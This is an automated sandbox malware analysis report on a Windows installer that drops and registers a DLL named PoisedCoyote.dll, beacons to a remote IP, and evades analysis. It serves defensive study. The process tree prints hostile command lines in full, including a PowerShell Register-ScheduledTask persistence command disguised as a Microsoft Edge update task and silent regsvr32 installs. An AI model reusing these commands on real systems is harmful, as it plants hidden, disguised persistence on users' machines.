Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1559884
MD5:fecd099f9b8d9500d7199a1054397e3f
SHA1:3df235780c9ad851474c20338e4921f5f2decaf7
SHA256:96a60b6cde63794b637bce219083e7905560c626e68c00af1d99be451c8c3700
Tags:exeuser-Bitsight
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: Powershell launch regsvr32
System process connects to network (likely due to code injection or exploit)
AI detected suspicious sample
Loading BitLocker PowerShell Module
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sets debug register (to hijack the execution of another thread)
Sigma detected: Potentially Suspicious Child Process Of Regsvr32
Suspicious powershell command line found
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to enumerate network shares
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Network Connection Initiated By Regsvr32.EXE
Sigma detected: Potential Regsvr32 Commandline Flag Anomaly
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7492 cmdline: "C:\Users\user\Desktop\file.exe" MD5: FECD099F9B8D9500D7199A1054397E3F)
    • file.tmp (PID: 7508 cmdline: "C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp" /SL5="$10478,1389145,140800,C:\Users\user\Desktop\file.exe" MD5: 14C6FA8E50B4147075EB922BD0C8B28D)
      • cmd.exe (PID: 7528 cmdline: "cmd.exe" /C timeout /T 3 & "C:\Users\user\Desktop\file.exe" /VERYSILENT /SUPPRESSMSGBOXES MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 7576 cmdline: timeout /T 3 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
        • file.exe (PID: 7636 cmdline: "C:\Users\user\Desktop\file.exe" /VERYSILENT /SUPPRESSMSGBOXES MD5: FECD099F9B8D9500D7199A1054397E3F)
          • file.tmp (PID: 7656 cmdline: "C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp" /SL5="$700F8,1389145,140800,C:\Users\user\Desktop\file.exe" /VERYSILENT /SUPPRESSMSGBOXES MD5: 14C6FA8E50B4147075EB922BD0C8B28D)
            • regsvr32.exe (PID: 7672 cmdline: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\PoisedCoyote.dll" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
              • regsvr32.exe (PID: 7688 cmdline: /s /i:INSTALL "C:\Users\user\AppData\Roaming\\PoisedCoyote.dll" MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
                • powershell.exe (PID: 7736 cmdline: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll' }) { exit 0 } else { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)
                  • conhost.exe (PID: 7744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • powershell.exe (PID: 8100 cmdline: "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{D7C2DB06-FCF6-4992-AF37-53F140CD5A88}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries) -RunLevel Highest" MD5: 04029E121A0CFA5991749937DD22A1D9)
                  • conhost.exe (PID: 8108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • regsvr32.exe (PID: 3152 cmdline: C:\Windows\system32\regsvr32.EXE /S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
    • powershell.exe (PID: 1880 cmdline: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll' }) { exit 0 } else { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Potentially Suspicious Child Process Of Regsvr32
Source: Process startedAuthor: elhoim, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:INSTALL "C:\Users\user\AppData\Roaming\\PoisedCoyote.dll", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 7688, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll' }) { exit 0 } else { exit 1 }", ProcessId: 7736, ProcessName: powershell.exe
Sigma detected: Network Connection Initiated By Regsvr32.EXE
Source: Network ConnectionAuthor: Dmitriy Lifanov, oscd.community: Data: DestinationIp: 154.216.19.129, DestinationIsIpv6: false, DestinationPort: 58001, EventID: 3, Image: C:\Windows\System32\regsvr32.exe, Initiated: true, ProcessId: 7688, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49736
Sigma detected: Potential Regsvr32 Commandline Flag Anomaly
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\PoisedCoyote.dll", CommandLine: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\PoisedCoyote.dll", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp" /SL5="$700F8,1389145,140800,C:\Users\user\Desktop\file.exe" /VERYSILENT /SUPPRESSMSGBOXES, ParentImage: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp, ParentProcessId: 7656, ParentProcessName: file.tmp, ProcessCommandLine: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\PoisedCoyote.dll", ProcessId: 7672, ProcessName: regsvr32.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:INSTALL "C:\Users\user\AppData\Roaming\\PoisedCoyote.dll", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 7688, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll' }) { exit 0 } else { exit 1 }", ProcessId: 7736, ProcessName: powershell.exe

HIPS / PFW / Operating System Protection Evasion

barindex
Sigma detected: Powershell launch regsvr32
Source: Process startedAuthor: Joe Security: Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:INSTALL "C:\Users\user\AppData\Roaming\\PoisedCoyote.dll", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 7688, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll' }) { exit 0 } else { exit 1 }", ProcessId: 7736, ProcessName: powershell.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB2694A0 BCryptGenRandom,SystemFunction036,16_2_00007FFDFB2694A0
Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Little Leg_is1Jump to behavior
Source: unknownHTTPS traffic detected: 93.93.131.124:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknownHTTPS traffic detected: 93.93.131.124:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB22B9F0 NetUserEnum,NetUserGetInfo,memcpy,NetApiBufferFree,NetApiBufferFree,NetApiBufferFree,LsaEnumerateLogonSessions,LsaFreeReturnBuffer,LsaGetLogonSessionData,memcmp,LsaFreeReturnBuffer,LsaFreeReturnBuffer,LsaFreeReturnBuffer,NetApiBufferFree,NetApiBufferFree,memcmp,16_2_00007FFDFB22B9F0

Networking

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 154.216.19.129 58001Jump to behavior
Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 93.93.131.124 443Jump to behavior
Source: global trafficTCP traffic: 192.168.2.4:49736 -> 154.216.19.129:58001
Source: global trafficHTTP traffic detected: GET /~sgtatham/putty/latest/w32/putty.exe HTTP/1.1Host: the.earth.liConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /~sgtatham/putty/latest/w32/putty.exe HTTP/1.1Host: the.earth.liConnection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 93.93.131.124 93.93.131.124
Source: Joe Sandbox ViewASN Name: SKHT-ASShenzhenKatherineHengTechnologyInformationCo SKHT-ASShenzhenKatherineHengTechnologyInformationCo
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.129
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.129
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.129
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.129
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.129
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.129
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.129
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.129
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.129
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.129
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.129
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.129
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.129
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.129
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.129
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.129
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.129
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.129
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.129
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.129
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.129
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.129
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.129
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.129
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.129
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.129
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.129
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.129
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.129
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.129
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.129
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.129
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.129
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.129
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.129
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.129
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.129
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.129
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.129
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.129
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.129
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.129
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.129
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.129
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.129
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.129
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.129
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.129
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.129
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.129
Source: global trafficHTTP traffic detected: GET /~sgtatham/putty/latest/w32/putty.exe HTTP/1.1Host: the.earth.liConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /~sgtatham/putty/latest/w32/putty.exe HTTP/1.1Host: the.earth.liConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: the.earth.li
Source: regsvr32.exe, 00000008.00000003.1818287850.0000000002934000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2089574907.0000000002945000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2324197266.00000000038C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.c
Source: regsvr32.exe, 00000008.00000003.1818287850.0000000002934000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGloba
Source: regsvr32.exe, 00000008.00000003.2088977331.00000000033A4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2020259374.0000000002E56000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2321313066.00000000038D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: regsvr32.exe, 00000008.00000003.2088977331.00000000033A4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2020259374.0000000002E56000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2321313066.00000000038D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: regsvr32.exe, 00000008.00000003.2088977331.00000000033A4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2020259374.0000000002E56000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2321313066.00000000038D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: powershell.exe, 00000009.00000002.1913116591.0000021FA4625000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2049496688.000002149E144000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2266875056.000001C81E4F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: regsvr32.exe, 00000008.00000003.1818287850.0000000002934000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2088977331.00000000033A4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2089574907.0000000002945000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2020259374.0000000002E56000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2321313066.00000000038D4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2324197266.00000000038C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: regsvr32.exe, 00000010.00000003.2320947816.0000000002DF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com1.3.6.1.5.5.7.48.2http://cacerts.digicert.com/DigiCertGlobalRootG2.crt
Source: regsvr32.exe, 00000010.00000003.2320947816.0000000002DF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com1.3.6.1.5.5.7.48.2http://cacerts.digicert.com/DigiCertGlobalRootG2.crtC
Source: regsvr32.exe, 00000010.00000003.2320947816.0000000002DF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com1.3.6.1.5.5.7.48.2http://cacerts.digicert.com/DigiCertGlobalRootG2.crtv
Source: regsvr32.exe, 00000010.00000003.2320947816.0000000002DF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: regsvr32.exe, 00000008.00000003.2090329426.0000000002829000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
Source: powershell.exe, 00000011.00000002.2098231476.000001C80E6A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000009.00000002.1881087363.0000021F947D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1964877701.000002148E2FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2098231476.000001C80E6A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000009.00000002.1881087363.0000021F945B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1964877701.000002148E0D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2098231476.000001C80E481000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000009.00000002.1881087363.0000021F947D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1964877701.000002148E2FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2098231476.000001C80E6A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000011.00000002.2098231476.000001C80E6A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: file.exe, 00000000.00000003.1748510327.000000007FD30000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748200530.00000000024D0000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000000.1749281885.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-DOVSB.tmp.6.dr, file.tmp.5.dr, file.tmp.0.drString found in binary or memory: http://www.innosetup.com/
Source: powershell.exe, 00000009.00000002.1921586400.0000021FACAA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
Source: file.exe, 00000000.00000003.1748510327.000000007FD30000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748200530.00000000024D0000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000000.1749281885.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-DOVSB.tmp.6.dr, file.tmp.5.dr, file.tmp.0.drString found in binary or memory: http://www.remobjects.com/ps
Source: powershell.exe, 00000009.00000002.1881087363.0000021F945B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1964877701.000002148E0D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2098231476.000001C80E481000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000011.00000002.2098231476.000001C80E6A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: regsvr32.exe, 00000008.00000003.2088977331.0000000003351000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2020259374.0000000002E03000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2321313066.0000000003881000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
Source: regsvr32.exe, 00000008.00000003.2088977331.0000000003351000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2020259374.0000000002E03000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2321313066.0000000003881000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
Source: regsvr32.exe, 00000008.00000003.2088977331.0000000003351000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2020259374.0000000002E03000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2321313066.0000000003881000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: powershell.exe, 00000011.00000002.2266875056.000001C81E4F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000011.00000002.2266875056.000001C81E4F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000011.00000002.2266875056.000001C81E4F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: file.tmp, 00000006.00000003.1789026333.00000000053A0000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, regsvr32.exe, 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmp, is-D8FFC.tmp.6.drString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
Source: powershell.exe, 00000011.00000002.2098231476.000001C80E6A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000009.00000002.1913116591.0000021FA4625000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2049496688.000002149E144000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2266875056.000001C81E4F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownHTTPS traffic detected: 93.93.131.124:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknownHTTPS traffic detected: 93.93.131.124:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB220B68 NtQuerySystemInformation,16_2_00007FFDFB220B68
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB21DBC0 GetProcessTimes,GetSystemTimes,GetProcessIoCounters,OpenProcessToken,GetTokenInformation,GetProcessHeap,HeapAlloc,GetTokenInformation,CloseHandle,NtQueryInformationProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,memcpy,ReadProcessMemory,ReadProcessMemory,memset,GetModuleFileNameExW,K32GetModuleFileNameExW,VirtualQueryEx,RtlFreeHeap,GetProcessTimes,16_2_00007FFDFB21DBC0
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB206890 memset,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,AddVectoredExceptionHandler,NtQueryInformationProcess,NtQuerySystemInformation,NtOpenThread,NtGetContextThread,NtSetContextThread,NtClose,16_2_00007FFDFB206890
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB216163: memcpy,CreateFileW,GetDiskFreeSpaceExW,DeviceIoControl,CloseHandle,CloseHandle,memcmp,16_2_00007FFDFB216163
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD9B1D4FFB9_2_00007FFD9B1D4FFB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFD9B1F4DFB14_2_00007FFD9B1F4DFB
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB21DBC016_2_00007FFDFB21DBC0
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB2AFC3016_2_00007FFDFB2AFC30
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB20185D16_2_00007FFDFB20185D
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB20F28016_2_00007FFDFB20F280
